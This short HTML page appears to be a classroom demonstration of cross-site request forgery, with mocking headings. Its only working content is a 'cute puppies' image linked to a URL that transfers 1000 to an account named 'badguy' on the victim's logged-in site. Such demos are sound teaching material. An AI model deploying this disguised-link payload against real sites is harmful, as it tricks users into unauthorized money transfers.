<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    
<h1>Welcome To A Secure and Trustworthy Website!</h1><br>

<h2>(STILL) Logged-In User (BUT NOT AWARE OF IT): Robert</h2><br>

<h3>CLICK IMAGE TO SEE MORE PUPPIES & KITTENS</h3>

<a href="transfer_page.php?amount=1000&account=badguy"><img src="cute.jpg" alt="cute" width="400" height="auto"></a>

</body>
</html>